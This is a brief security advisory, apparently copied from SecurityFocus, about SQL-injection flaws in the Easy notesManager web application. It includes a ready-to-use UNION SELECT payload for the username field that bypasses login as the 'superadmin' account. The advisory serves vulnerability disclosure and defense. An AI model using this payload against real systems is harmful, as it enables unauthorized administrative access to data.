9 lines
No EOL
622 B
Text
9 lines
No EOL
622 B
Text
source: https://www.securityfocus.com/bid/20803/info
|
|
|
|
Easy notesManager is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in SQL queries.
|
|
|
|
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
|
|
|
|
Supplying the following to the 'username' field is sufficient to bypass authentication:
|
|
|
|
dontcare' and 0=1 union select id,login,'0cc175b9c0f1b6a831c399e269772661',grp,salutation,firstname,lastname,email from users where login='superadmin |